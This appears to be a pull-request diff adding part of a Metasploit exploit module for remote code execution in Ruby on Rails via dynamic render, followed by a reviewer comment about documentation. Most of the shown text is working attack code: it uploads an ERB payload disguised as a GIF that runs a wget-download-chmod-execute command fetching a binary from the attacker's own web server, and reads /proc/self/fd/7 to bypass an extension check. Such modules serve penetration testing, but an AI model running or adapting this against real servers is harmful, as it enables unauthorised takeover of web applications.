modules/exploits/multi/http/rails_dynamic_render_code_exec.rb

```diff
@@ -0,0 +1,246 @@
+    @bd = rand_text_alpha(8+rand(8))
+    fn  = rand_text_alpha(8+rand(8))
+    un  = rand_text_alpha(8+rand(8))
+    pn  = rand_text_alpha(8+rand(8))
+    register_file_for_cleanup("/tmp/#{@bd}")
+    cmd  = "wget #{@service_url} -O /tmp/#{@bd};"
+    cmd << "chmod 755 /tmp/#{@bd};"
+    cmd << "/tmp/#{@bd}"
+    pay = "<%=`#{cmd}`%>"
+    print_status("uploading image...")
+    data = Rex::MIME::Message.new
+    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'cookie' => @cookie,
+      'uri'    => normalize_uri(datastore['URIPATH'], pn),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => data.to_s
+    })
+    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)&gt;/
+      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)&gt;/
+      return true
+    else
+
+      # this is where we pull the log file
+      if leak_log
+        return true
+      end
+    end
+    return false
+  end
+
+  def leak_log
+
+    # path to the log /proc/self/fd/7
+    # this bypasses the extension check
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
+      'method'    =>  'GET',
+    }, 60)
+
+    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
+      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
+      return true
+    end
+    return false
+  end
+
+  def start_http_server
+    @pl = generate_payload_exe
+    @elf_sent = false
+    downfile = rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile
+
+    # do not use SSL for the attacking web server
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+    @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+    service_url_payload = srv_host + resource_uri
+    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+    datastore['SSL'] = true if ssl_restore
+    connect
+  end
+
+  def render_tmpfile
+    @path.gsub!(/\//, '%2f')
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], @path),
+      'method'    =>  'GET',
+    }, 1)
+  end
+
+  def exploit
+      print_status("Sending initial request to detect exploitability")
+      start_http_server
+      if send_payload
+        print_good("injected payload")
+        render_tmpfile
+
+        # we need to delay, for the stager
+        select(nil, nil, nil, 5)
+      end
+  end
+end
+
+=begin
```

Comment:
From here down should go in to a documentation markdown.  Something similar to https://github.com/h00die/metasploit-framework/blob/9d2355d128a69768a5226e1ea143326da66c437e/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md

The instructions for installing the vuln software in the PR can also go in there, make things nice, clean and easy.